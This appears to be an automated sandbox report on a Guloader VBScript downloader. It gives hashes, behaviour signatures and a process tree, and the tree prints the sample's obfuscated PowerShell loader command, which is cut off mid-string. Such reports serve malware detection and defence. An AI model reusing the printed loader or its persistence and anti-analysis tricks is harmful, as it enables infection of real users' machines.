Analysis
-
max time kernel
149s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
17/03/2023, 07:25
Static task
static1
Behavioral task
behavioral1
Sample
834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs
Resource
win10v2004-20230220-en
General
-
Target
834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs
-
Size
1.4MB
-
MD5
493f1f295b01e6e965b95e92f154f574
-
SHA1
8be9c7216f94da9079f4a64c89ec71d7c310f8f8
-
SHA256
834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54
-
SHA512
a61460ddad23d35e7a37239d4ae0ec6bb24fbea7495e895878bba911ae8c84c6965537eaeae30456a69d49d96a7ccd8491ecda1b3a2f57d17595ee63e912ff80
-
SSDEEP
24576:li8jvyzEb8BK0qlSx58jfpF2sv/4hRu3gqX4Tw4:I8Db8fmxF2MmRs4
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Adds policy Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-1914912747-3343861975-731272777-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run msiexec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 2 1336 WScript.exe 18 1540 msiexec.exe -
Checks QEMU agent file 2 TTPs 2 IoCs
Checks presence of QEMU agent, possibly to detect virtualization.
description ioc Process File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe ieinstal.exe File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe powershell.exe -
Loads dropped DLL 1 IoCs
pid Process 1540 msiexec.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \Registry\User\S-1-5-21-1914912747-3343861975-731272777-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run msiexec.exe Set value (str) \REGISTRY\USER\S-1-5-21-1914912747-3343861975-731272777-1000\Software\Microsoft\Windows\CurrentVersion\Run\0L1LWVYXU = "C:\\Program Files (x86)\\internet explorer\\ieinstal.exe" msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1728 ieinstal.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 836 powershell.exe 1728 ieinstal.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 836 set thread context of 1728 836 powershell.exe 30 PID 1728 set thread context of 1204 1728 ieinstal.exe 21 PID 1540 set thread context of 1204 1540 msiexec.exe 21 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \Registry\User\S-1-5-21-1914912747-3343861975-731272777-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 msiexec.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 524 powershell.exe 836 powershell.exe 1728 ieinstal.exe 1728 ieinstal.exe 1728 ieinstal.exe 1728 ieinstal.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1204 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
pid Process 836 powershell.exe 1728 ieinstal.exe 1728 ieinstal.exe 1728 ieinstal.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe 1540 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 524 powershell.exe Token: SeDebugPrivilege 836 powershell.exe Token: SeDebugPrivilege 1728 ieinstal.exe Token: SeDebugPrivilege 1540 msiexec.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1336 wrote to memory of 524 1336 WScript.exe 27 PID 1336 wrote to memory of 524 1336 WScript.exe 27 PID 1336 wrote to memory of 524 1336 WScript.exe 27 PID 524 wrote to memory of 836 524 powershell.exe 29 PID 524 wrote to memory of 836 524 powershell.exe 29 PID 524 wrote to memory of 836 524 powershell.exe 29 PID 524 wrote to memory of 836 524 powershell.exe 29 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 836 wrote to memory of 1728 836 powershell.exe 30 PID 1204 wrote to memory of 1540 1204 Explorer.EXE 33 PID 1204 wrote to memory of 1540 1204 Explorer.EXE 33 PID 1204 wrote to memory of 1540 1204 Explorer.EXE 33 PID 1204 wrote to memory of 1540 1204 Explorer.EXE 33 PID 1204 wrote to memory of 1540 1204 Explorer.EXE 33 PID 1204 wrote to memory of 1540 1204 Explorer.EXE 33 PID 1204 wrote to memory of 1540 1204 Explorer.EXE 33 PID 1540 wrote to memory of 988 1540 msiexec.exe 34 PID 1540 wrote to memory of 988 1540 msiexec.exe 34 PID 1540 wrote to memory of 988 1540 msiexec.exe 34 PID 1540 wrote to memory of 988 1540 msiexec.exe 34 PID 1540 wrote to memory of 988 1540 msiexec.exe 34
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\834156efc9ef8abf1fa3ab73c13f512eaf2beb84a2aaec6f7c1e2eaf36fcae54.vbs"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Laryngologi = """ FLu n c tFi oRn OB eft a t e snt eArHn ecsE4A1S0 {W T d epBa r a m (T[TS t rMi nRg ] `$IR y ait pEpGe s ) ;M A S `$Sm yZzooTn t eJss =U TNMe w -BOnbBj e cDtQ Pb yAtTeT[A]P R(T`$HRGyNaStIpupFeSs . LNe n g tOh P/A 2B)K;M q R CFUoAr ( `$ON eNdssIi vSn iOnRg s a n lVges =S0A;R `$SN eVdHsFiUvPnSi nSg sAa n lAg sT - l tT S`$JRhy aDtdp pAeGsm.HL eDnGgMtChS;O M`$MNSe dLsBiUvKn iEnKgas a nBlRgEs +P= 2U) {S S F`$ P aKsIsTi oFn e r eFd eS = `$DR y aItbp pfeOsA. Snu b sbtPrIiHnHgK(F`$tNBetd sEiSvTn iVnEg sPa nSl gUsI,C S2 )G;B U T B A S`$UmFyLz o n tSeTs [ `$ NReRdNs i vnn i nRgPsYaUnOlPg s / 2S] H=f M[ecFoPntvEeBrMt ]C:E: TIosB yLt e (S`$ P a sDsDi oWn e rMeEdse ,T F1R6 ) ;O U C`$ m y z o nPt eRsM[M`$ NMeCdBs i v n iWn g s aMnJlCg s / 2 ] = K(K`$LmBy z oYn tMeMs [N`$HNLeHdtsSiGvDn i nMg sRa n lOgisT/S2B]A p-Pb xPo r u1 9f0F) ; F F }E P[NSItBrri nCgE]R[ SSyTsBtSeBmA.AT eSx t .REMn cGoHd iRnUg ]E:T:DACSSC I IP.dGwe t S tCrfi nTgK(U`$ m y zFoAnHt eus ) ; } `$BA dUjtu nTcptIlSyW0I=CBPeKt aNtGeFs tPe rCn eKsS4 1 0F C'EE D C 7VC DKCVA D BAD 3 9 0 DIARD 2 DD2 'H; `$ A dejLu nPcIt lRy 1B= B e tRaLtSe set esrpnHe sC4p1U0S 'tF 3AD 7OD DNCFCSD 1SC D DI1DDF8 CSAA9D0 EH9 D 7FD 0O8 D 8 CP9 0TE B Db0PCOD DsFLD 8VDABCFS0 DBFLCcAvD 7JC 8MD B F 3SD BSC AHD 6NDM1KDHA CTDS' ; `$FA d j u nAcBtAl yG2 =PBOeKtAa t eBsCtEe rCnHe sg4 1S0 G'UFS9 D B C AFEnEsC CGD 1LDLDRFbFRDAACDAA CYC DCB C D CLD ' ; `$BAFd jBuMn c tTl yS3 =SBDeAtFa t e s t e r n e sP4R1T0H M'REIDSC 7 C DCC A D BTDF3S9N0PEACaC B D 0SCPAGDY7 DS3 D B 9 0 FS7TDJ0DC A DABWC C DK1HCSEEE DTD BHCACFCM8BDT7TDAD DCBPC Dg9n0AFB6BD F D 0 D A D 2 DWBBE CTDABBDB8K'N; `$PA d jiuSnTc t lTyI4 = B e tsa tAeCsotFeTr nIeIs 4 1B0A I' C DNC AECaCGDS7 D 0 DN9B' ; `$ AUd jAuDnNcKtSl y 5 = BEe tFa t e sMt e r n e s 4 1H0E N'KFS9fDtB CIA F 3 D 1 D AYC B DF2wDtBUF 6 D FCDG0DD AIDR2PDHB 'G;S`$MATd jTu n cutFl yS6M=RBIe t aFtHe sFtGeRr nDedsO4S1T0B 'BEHC ENASE D COE DRBFD D D 7 D FCDS2UFS0 DTF DS3JD B 9 2E9tE F 6BD 7KDFABD BVFCCDCC7HE D D 7TDU9M9 2 9HE E ENCGBUD C D 2LDF7YD D 'T;S`$VA dRjMu nTcHtal yB7 = Boe t a tMeRs tie rFn eMsA4V1 0O I'KE CMC BSD 0 CAA D 7 DR3 DaBK9 2C9 EEFT3aDTF D 0lDSFADM9FD BADMA 'S; `$YA dPj uSnTc tSl y 8 =TBJe tNaBtHe slt eWrEnIe s 4 1C0 'PEfCDDSB Dm8RDS2SDTB DAD CKA D B DFAAFGA DKBTD 2IDPBUDS9AD FHCRA DABF'U; `$ AGdKj u nac tBl y 9P=rBVeCtEa tCeTsEtMe rInReHs 4 1v0 E'bFD7 D 0 Fw3DDFB DE3 D 1AC C C 7HF 3ODP1MDIA COBIDG2 DFB 'T;S`$ FToBrMuSd iBnAd tCaEgBeBtu0P= BRe t a tReRsUt e r n e sT4M1j0N U' F 3UC 7 F A DKBSDM2ND B DY9LD FSCpAJD BIE A CP7SCPEFDSB ' ; `$ FSoCrFuBd iCnDdStMaIg eBtM1T=FB e tTa tAeRs t eErKnDeis 4G1 0a H' F DSD 2 DFF CMD CVD 9C2C9vESE ESCUB D ChDE2KDn7 D DI9S2 9 ErEND DGBPD FADK2 DUBCDCA 9N2 9HEAFNFUD 0HCRDTDV7HFVDCD 2UD FKCHDACCDA9O2Z9 E F FaCPBTCEAMDH1 FGDSDD2 DCF CID CRDt'R;T`$ FSo r uAdsi n d tOa gMeEtR2R=sB eTt a tKeUsSt e r naeAsF4 1B0 A'dFK7CD 0 C 8 D 1 DS5IDHBS' ;V`$TFMoBrFu dTi n d tIaog e t 3O= B e tSaFtPets tDeBrBn e sT4S1G0S O' EREDC BKD CTDR2DD 7eDHDS9 2 9PESFA6 D 7TDdA D B FACCCp7 E DRDS7hDt9S9T2L9SE FU0dD BSCs9SE D D 2KD 1 C A 9 2K9 E E 8EDV7 CACEC AVC BOD FCDN2R' ; `$ FSoIrJuGdDiVnUdGtBa gKeKtM4 = B eKtba tNeSsStGeErRn e si4d1R0H S'AES8ADM7 CECAC A CNBNDMFODF2 FdFCD 2 D 2 DD1KD DF'I;R`$ F oUrdu d iUnQd tTaTg eSt 5B=MBMe ttaMtOeDsst e r n eDsV4o1 0 'PDs0 C AzD A D 2 DT2P'j;E`$FFPoKrCuOd iAnTdAtUaPg eTtP6s= BSest a tIe s tEe rAn etsS4R1 0 b'BF 0FC A EfE CBCpDP1DC A D B D D CPANEM8 DR7 CfC CDAFC BHD FND 2HFP3 DNBED 3WDG1OC CPC 7P'C; `$IFRoKr u dUiDnBdmtHaOg ePtI7p= BNe t aCtVeLs tJe rUn eIsP4P1K0 ' FL7SFTBPEB6 ' ;B`$IFAo rSuad iSnBd t a gBe tA8 = BteFt aAtFe s tHe rTnFeTsv4B1D0C G' Er2 ' ;G`$ O v err c h a nnnFePlE=FB e tLaKt ePs t eMrSn e sB4u1 0 'AE BDE D FEB E CE8 D 8ECS'D;U`$ SAo v sdeLsekLeSe n = BWe tSa t eTs tCeKr n e sG4 1P0D L' FSD DTFHDF2SDF2TEF9BD 7GD 0TD ACDE1OC 9SELEVC C D 1SDRD FUF ' ;FfUu nHcLt i o nB Df kHpA R{DP aArtagmS h(S`$ SUkJoKlCe mIe sFtJeRr eerVeArA6 8F,D R`$SSHkBiBd eKrSiBk )B C M B H;M`$ JTuTdDiPc ajtUiKv eL0 = B e t a tBe sFtFeKrJnMeFsa4 1v0 U'H9 A F 7 D A CSCDD 7BDG8 CUA CTD C ATC A DABKD 2CCPD DSBSDS0p8CFH8D7 8CAR9 EI8 3t9 E 9 6IEF5SF F C E CVERFCA DC1 D 3 DTF DM7FDD0SE 3R8S4 8 4 FND CSB C COCGCDDUBEDD0SC AMFFAADA1 DL3 DdFRDz7 Dh0 9 0SF 9 DGB C ANFrFkC DbCPDIDTB D 3 D CFD 2FDs7BDLBACWD 9B6R9I7 9 E CP2H9DE E 9DD 6 D B CECKDcB 9E3VFb1SD C DA4SDAB DFD CHA 9 EAC 5 9 EB9TABEE1 9R0 FA9 DT2 DO1 DDCSD FTDk2FFPFFCBD CADED B D 3 DLCFDb2PCA7LFSD DFFUDLD D 6MDSBP9 EB9 3AF F D 0 DMAA9NEP9CA E 1 9U0PF 2RDS1SDUDMDdFSCSADDF7PDR1CD 0R9M0SE DAC ETDB2BD 7 CBAP9 6H9CAMF 8RDG1 C CVCTBFD ACD 7PDA0MDOASC ASDSF DR9 DEBmC AP8 6C9N7aE 5S9 3B8AFME 3s9C0CFNBLCKFgCMB DWFiD 2 CPD 9T6 9KA F FPD A DF4 C BHDF0JDODUCPA D 2DCC7J8 E 9B7 9 EEC 3 9a7S9V0 FS9 DSBOC A ESA C 7CCOEODOB 9 6 9 A FSF D A DT4TCBBBD 0DD DCCoA D 2TC 7 8UF 9 7K'T;d&V(O`$TFAoSr usd iOnRdStCaIg e t 7B)R G`$ J uTdJiZcNa t i vOeM0O; `$FJPu d iecSaPtUi v e 5 B= ABKeFt aJtDe s t eSrAnSeRsF4B1S0 F'o9BA FaD DH1nDR0 CDAUD FADA7KDK0MDRBSC C D 6 D FFCC8 DO0 D BR9AE 8H3 9 ES9SADF 7 D ASC C DT7BDj8SC APCvDUCUA CAA DBB DA2AC D DBBMDA0E8BF 8D7G8PAU9 0MF 9 D B CSAMF 3HDAB CSA DG6DDH1 DTA 9M6A9PA FYFHDuAFDM4 CEBBD 0tD DECVATDO2 C 7S8AC 9O2 9NEKER5DEUAECS7 CZERD BBEM5 E 3SEN3 9BE FKEF9 6I9 ADFNFsD AMD 4 C BUDL0 D DHCMA Ds2XCM7F8 D 9P2 9KEB9 A FVF DSAIDU4ECBBaD 0LDSDACPAIDP2HCi7H8 AL9C7r9F7D' ;n& ( `$ FToUr uKdLiAn dBt a g eAt 7G) `$DJRuSdAi cBa t i vse 5G; `$TJTu d iPc aItEiEvMe 1n S= UBgeft aTt eTsUt eGr nFe s 4I1B0b T' CSC DRBTCFAACFBSCFC DA0F9GE 9AA FND DF1ED 0HC A D F DA7PD 0UD B CICsD 6 D FPC 8HDS0WD BS9H0 Fn7 DB0HCE8ND 1HDB5BDABk9 6B9NAWD 0 CABPDm2 DW2D9T2 9UEPFDE 9 6PEP5vEUDLCI7ECSDPC ASD B DU3C9S0 ELCECDB D 0TC A DF7fD 3FDPBS9S0AF 7 DF0 CBA DRBrCQCFD 1 CTEDEaD DBBACHC C 8BDN7 DNDsD BCCLD 9 0BFS6 DFFTDO0 DBABDR2 DABCE C DNB D 8 Es3 9 6SF 0UD BHCA9 9D3PFH1 D C D 4 D BUDRDCCGAP9 E EFDSCP7TC D C AFDGBBDE3K9A0IE C C BDDC0VC ANDH7TDO3 DWB 9S0EF 7 D 0DCCA DkB CrCUD 1uC E ECD D BTC C CR8 DD7tD DFDGBMCID 9l0rFT6BDTFAD 0SD AODF2 D BTENCCDSBPD 8B9 6E9G6OF 0SD BBCO9s9 3VF 1 D CSDP4FD B DTDBC AZ9RE FA7CD 0 C A EAERC A CLCS9J7h9I2 9 Eb9 6F9BAPF 7SD ARCMCuDC7 DR8FCPAsCSDhCBAOC A D BRDu2 CLD DPBSDD0 8 FN8 7s8 AE9B0NFP9pDMBECPAOFG3 D BHCHArD 6 D 1 D AG9b6D9ZAJFOFCDAA DS4ICBBTDF0SDUD CBAHDJ2 CJ7R8UBO9p7 9 7E9 0 FT7rD 0 C 8CD 1sD 5 D B 9V6 9NAFD 0PC BLDK2JD 2B9 2F9 EMF E 9N6P9 ATERD DS5 D 1 DA2DDDBOD 3 DIB C DACNA DPBFCUCFDPBECOCLD B CLCF8 8 8S6T9U7P9C7L9 7I9K7S9T2P9 E 9UA EVDKDS5 DM7SD ADD BTCOCEDS7ODL5 9D7 9B7F' ; & (F`$ FSo rAuCdCi n dwt a gSeDt 7 ) `$ JuuPdSi c a tNiSvGe 1F;K}Mf uUnOcNtIiIo n SG D T A{ PFaar aTmU H( [PPTacrPaWm eGtNeMr (SP o sDi t iEo n S= S0P,M NM a nUdDa t oOr y U= T`$ TTr utep)V]H M[ T y pPe [ ]O]a `$RUBnSp r i nbcPi pAl ePd lUy 1 8 ,C[UPTa rSa mFeSt e r (RPSoSs i t igoRn I= L1R) ] k[sTTyLp e ]R F`$ A lDfHa rPyLtDm e F=S B[FV o iTd ] )G;m`$NJ uTdOiEcEaTtCiHvPea2 K=D B eKt a tNess tHekrSnReHs 4A1 0P ' 9 AGDU0 C BTDP1BCB8SD 1S9DEE8S3C9 E EU5 F F CBESCFEKF A DS1KDB3FDDFgDH7 D 0rE 3K8S4B8P4 FHDHC B CFC CRCFD BFD 0 C A FbASDJ1PDS3 DEF D 7ADS0T9 0BFSA D BFD 8UD 7TDB0 DCBKF A CE7 D 0SD F DJ3 DF7 DLDCFUFAC D CMDCDEB D 3 D CGDV2DC 7 9M6G9a6OF 0UDRBaCL9 9 3IF 1 D CADT4SD BUDSDMC A 9 ERE D CL7 CPDAC ASDbBPD 3 9 0ME CRDWBEDD8GDO2UDTB DDDKCTASD 7BDF1 DC0 9 0DF FECNDSCFD DCB DR3ED C D 2aC 7MFP0KDFFSDK3 DtB 9 6 9 ASFGF D A DU4 CCB D 0SDTDBC A DA2 C 7D8 6 9 7 9 7B9 2 9PE E 5 EED CU7 CRD CbApD BPDG3P9 0oEBCRDvBADS8 DB2 DUBUD DMCKA D 7CD 1VD 0 9b0 FDBCD 3PD 7 C A 9 0SFSFOCAD C DMDPBEDF3 DFCLDI2BC 7TF C C B D 7 D 2 DJA D BUCDCDFKFEDAD DSDKDABRC DLCODAEC3S8 4K8 4 E C CPBPD 0n9B7O9A0 FAAHD BTDY8 DL7SDN0BDUBGFCANCO7LD 0BDSF Da3FDb7 DSDRFw3MDK1 DMA CUBQDC2 D BS9 6S9 ASF FRD A D 4 C BMD 0FD DGCNA DM2BC 7 8K7 9s2M9NEt9 ATDB8 D F DG2CCAD DSB 9 7H9J0FFIA D B D 8 D 7 D 0DDBBuEMA CB7OC EVD BL9A6 9 A F 8HDE1ACSC CCB DCAFDK7 DM0 DTAuCsAKDCF DD9HDKB C AC8 ES9A2K9PEV9 APFK8ODB1aC CCC BPD ATDS7PD 0UDTATCPAJD F DT9 DLBBCLAP8 FA9 2 9IEFES5AE DUCU7 CPD C A DUBBDT3 9 0NF 3 C BPD 2 CDABD 7 DjDDD F C D CKA FPATDUB DH2RDVB D 9ADHFTCPAPDSBUEF3S9 7P' ; & (F`$ F oOrpu d iPnBdEtBaOg e tA7u) L`$ JUuAdMi c aOt i v eS2U;H`$ JMuSdIiNcka t iLvUeL3T =P BBMeCtRaBt ensBtAeVrSnDeKs 4N1P0 A' 9 A D 0 CSB Da1 CF8BD 1E9B0TFBAFDBB D 8UDT7FDG0NDDBaFFD DC1bDC0TCHDDC ASC CECSB D DLCoA DS1FC Ca9 6F9 AUFBF DDADDC4RCFB D 0CD DPCMAGDt2CC 7 8S8t9U2 9bE EH5NE D C 7BCUDLCLAMD B DO3 9B0 ESCHDFBBD 8 DF2 DBBWD DTC APDt7ADA1BDH0H9 0 FSDDDKF D 2 DW2AD 7 D 0TD 9BFBD D 1FD 0LC 8uDBBCD 0MCDASDK7pDS1 DO0PCSD ES3 8F4h8R4MEWDTCOADDCFDDL0UD A DNFTCBC D AU9 2c9PEP9 AaEUBED 0 CUEUC C D 7PDN0 DDD DI7sC EPD 2DD B DHAFD 2CCP7 8RF 8 6 9 7T9 0 ESDEDRB C AKFA7AD 3TCPE DS2DDBBSDS3 DDBSD 0 CIA D FFC AADN7uDa1 D 0 F 8 D 2TDHFRD 9 CBD 9j6 9CA FSFLDPASDB4FCDB DK0 DSD C A DU2 CT7M8P9G9O7 'G;P&G( `$CFUofrBuSdAi nFd t aFgbe t 7U) B`$ JCuGd iUcAadtOi vKe 3F;O`$PJMu d iPc a tViSv eK4S A= BCeutMaMtTeFsAtAe r nAePsA4U1 0S B' 9AASDS0ACCB D 1pC 8 D 1S9R0MF AFDBB D 8 D 7ODN0TD BRFR3 DGBFCNAPDU6HDT1 DTAS9P6 9 AFF 8bD 1FC C C BBDTABD 7 D 0MDcAWCOA D FTDF9 DtBNChA 8WCI9F2D9 EA9ZA F 8ED 1UCAC C BFDAA Da7SD 0BDVAWCAA D F DS9BD BpCBAJ8 DF9 2U9 EP9DA F F D 2OD 8 DbFUC CICB7 CLATD 3UD B 9 2K9SE 9cA E BSD 0GC E CEC D 7CD 0UDOD D 7SCSEMD 2 DFB D ASDE2DCF7d8TF 8 6G9 7B9 0FEVDWDSB C ASF 7SDP3 CFERD 2 DSBbD 3MDCBFDF0UCEAVDRFOC ARD 7 DM1ADC0SF 8rDS2UDTFUDS9KC D 9 6s9SAFFAF DGARD 4SCNB DU0 DFDUC A DA2LC 7C8 9 9 7 'K;O& (M`$PFFo rBuSd iAn d tVaAgPeDt 7 ) E`$ J u d i cQaotUiTv eS4B;S`$SJpu d i ckaDtRiAvre 5G u= KB e tpastSe sAt e r n eGsB4K1 0 'SC C D B CAA C BSC CKDR0 9SE 9 A DP0 C BIDB1 C 8 D 1 9R0DFSDHCPCUD B D FMCAA D BNEOAIC 7UC EFDVBS9D6 9 7S' ;T&U( `$ FNoIrGuGd i n dUtEa gBe tQ7 )K D`$RJFu d iScCaGtTiCv eO5 D v; } `$ BNiToGgSrBa fLiHeHr nRe H= EBBePt a tKe sSt eBr nWe sS4D1i0A N' D 5 D B C CMDT0DDUBOD 2 8 DF8SC 'S;L`$AJAuMdSiUcTaCt iFvKe 6 B=T oB e t aBtje sktReSrEnMepsN4s1G0 ' 9 APE E C BUDS3TCTE DFBMC CWD 0UDMB C D 9 EN8B3F9 E E 5PEBDGCW7RCpDRCAAOD BADk3N9B0 EKCOCLB DM0 CTAFDU7FDF3 D B 9A0RFC7 DU0TC ATDPB C CHD 1SCAETEVDWD BRC CFC 8TDF7SDUD D B CDDA9K0PFP3MDTF CSCSC D DT6 DNF DH2EE 3 8L4 8 4OFB9 DLB CEAPF A D BAD 2 D B D 9HDUF C A DUBOF 8 DB1BC C F 8FC BGDP0SDADNCMAuD 7 D 1BDU0SE EBD 1FDL7UD 0WCHAMDGB CLC 9 6M9H6 DF8DDF5KC Ea9SEB9GADFCC DR7RD 1DDF9OC CJDAFADT8BDn7JD BuCJC D 0 D BF9 ES9AA F 8HDP1 C C CRB DPAaDc7SD 0GDHASCsA DGF DK9PDDBFCEAN8TAs9V7 9W2 9CEI9 6 FS9 FFAvELAM9IEaF ER9M6 ED5RFS7ADS0PCSA E EHCUADCMC EH3 9 2 9 EOEH5 E B F 7HD 0 CPA 8dDC8KC EU3 9A2 9 E Es5 E BUF 7 Dz0UC A 8NDP8uCAEA3F9 2C9QE E 5 ELBOFU7 DI0DCEA 8 D 8SCDE 3 9G7A9ME 9 6SEU5 F 7LD 0 C AUE E CKAWC CKEG3T9F7M9 7S9 7 ' ; & (F`$IF o rTuIdTiSn dstRaDgCe t 7 ) `$LJ uLdUiIc a t iUv e 6 ;V`$ JDoLsFiUn a =B FfRk pN D`$ FOo rMu dTi nNdUt aAgSe t 5T P`$ FRo rPuBdoiCnHdBt a g eBtT6S; `$fJ u dDiTc aAtGi vUeA7C F=H B e tsaAtTe sstue r nKe sT4 1M0 'R9JABFSC D BUCED D 5 CICGD 7GDI0PDI9 D BAC C 8NDA9 E 8C3A9FEg9 AFE ESCMB DB3PCfEFDfB CSCFD 0 D BNC D 9K0FF 7LD 0OCP8 D 1 DA5HD B 9 6 E 5 F 7 Da0DCFAREGE C A C C EG3 8E4O8 4 EF4 DTB CMCSDG1 9M2 9TEG8 8 8 B 8 E 9m2B9 E 8PEUC 6 8EDU8 EP8 EK8aEA9 2 9DE 8 E CO6 8 AL8 ES9 7d' ; &c( `$ FFoSr u dAiSnSd tCaSgleHtT7P) M`$ J u dNiPc aRtBirvfem7K; `$SJ u dEiSc aEt iTv eM8G =B BCeGtSa tSe sSt e r nTeTs 4 1 0J T'L9FA FNF C BMCPCLDPB DA0JD B 9 E 8G3 9rET9SAHEBE C B DA3DCfEEDMB CSC D 0CDPB CoDU9G0FFA7LD 0HCM8 D 1pDD5 D BT9 6UEP5 F 7bD 0 CSAUEKE CNABCGCPES3E8U4 8 4 E 4 DJB C C D 1H9B2H9 E 8B7f8 D 8 8 8bDG8s6I8 8D8UB 8O8 9L2F9 E 8DE CP6S8DDR8TE 8RE 8 ED9 2F9UEO8 EUCM6 8 AB9W7 ' ;b&T(R`$ F oArSuBdViEnPd tWaIg e tH7 )s `$RJ u d i c aAt iDv eH8U;C`$RBSeDs k r iLnsgEe rP0 0u=K'CH K C U :R\HaUhAo rGnPtTrBe r nEes\USPo lVdBeFbAr oerS'S; `$GB eFsFkFrriTnPgCe r 0C1 = B eCtLaStee sKt e r nSeEsF4 1S0 b'S9 A F FgDS2 CAB D 3TDP0 D BSCkCSC DN8R3 9E6cF 9SDCBOCTAK9D3 F 7 CFA D BDDC3 E EJC C D 1 CdEFDTB C C ClABCb7M9BEI9 3DESEBDaFLC ABD 6 9HEE9PANFFC DKB CFD D 5 C C D 7KDb0HDV9RDSBPC C 8 E 8TE 9F7 9R0 D BFCF6DCFA CBCEDFF CSE DH1UDR2 DBFDC A D BC'O;T& (d`$lF oLrSu d i nEdMt aOgIeAtO7F) A`$ BMe s kbr i nDgbeSrB0 1A;U`$aJOu dPi c a t i vFeR9 =B OBTe tLa tPe s tMeGrNnGeNs 4 1H0C t'S9PACFD4 CPB D APD 7 D D DFFCCRA D 7sCu8 DSBG9BES8F3P9CESEF5SE D CS7VCSDGC AUD BTD 3R9 0 FSD Dg1ED 0SCB8PDuBSCSC CBAVED3 8H4P8K4GF 8SC CCDf1ADS3TF CBDIFGCPDUDSB 8 8 8OA E DPC A C CBD 7 DA0 D 9M9 6g9KA FMFFDR2OCVB DR3 DT0FDIBSCBC CSD 9 7O's;U&T( `$ F o r u dKiSnMdDt aLgEe t 7I)R `$ J ubdUiUcSa tiiIvPeK9 ;S`$OA lAuAmDn eGr s 0K E=O MB ePtPaBtPeSsAt ear nOe sP4G1 0F ' EB5 E DPCI7 CUDLCKA D B DB3V9 0AEBCECSB DB0RC AbDS7EDu3UDIBO9B0 FK7MD 0 CmAADABSCVCcD 1SC E E DTD BPCCCEC 8FDI7EDEDKD BSCBDO9S0KFJ3FDPFSC C CHD D 6 DSFAD 2 E 3C8s4 8P4 FNDZD 1 CsESCb7r9S6 9sAIF 4 CABMDtABDS7 D D DtFCCDATDf7 CS8 DCB 9D2a9tE 8 EU9H2P9LE 9 EM9UATFDC D BFCKD DM5BCLCCD 7fDS0KDT9OD BUC CH8 DT9O2R9BER8I8F8TBI8SE 9 7 'T;s& (T`$EF oBrDuEd i nVdBt aLgOePtT7O)B N`$ AHlBuTmOnFeUrAs 0R;A`$ OBm tAuFmBl e tD=A`$FJSuIdTi cBaOt i vCeL.oc oSuMnOtU- 6d5P0T;F`$EASlMu mFnle rds 1T T=V B e tUa tDeTs t e rDn eFs 4S1 0 'SE 5 E D CS7RCSDSCNAPD BKD 3 9H0BE CMC BUD 0 CSA DI7 D 3 D B 9U0 FL7FDC0TC AWDSB CUCCDH1PC EYEAD D BhC C C 8 D 7 DFDSDRB CGDC9L0 F 3 D FGC CpC DBD 6 DHFTDc2PES3 8T4D8L4MFPD D 1SCKEAC 7U9 6 9SAPF 4 CBBHD ARD 7DDTD D FRC AEDM7 C 8 DAB 9B2m9 E 8 8 8 B 8SEA9D2U9PEI9 AAF FAC B CPC DPB DM0MD B 9R2 9RE 9AABF 1 D 3TCBARCGB Db3 DF2ADsBRCbAU9A7 ' ;T&o(S`$RFBoNrBu dCiTnMd tSa g eBtK7F) `$TA lAuDm nPe rCsO1N;A`$SA lRu menAebr s 2a T=S TBUe tRaEtUe s t eFr nFe s 4S1 0E P'U9 AwF 4UD 1BDT0 DJ7eC D D BMC CAD 7MD 0HDT9 D B CPC 9 E 8 3 9RE E 5TEFDGC 7SCFDGC A D BnDI3B9 0wEIC CTB DP0tCuA DV7SDd3KDSBT9S0UFE7 DP0KCDA DUBSC CNDE1EC E EMDlDUBPCCCOCK8 DU7LD DTD BMC D 9U0CFF3eD F CFC C DRDA6CDtFPD 2 EB3E8 4U8 4DFD9 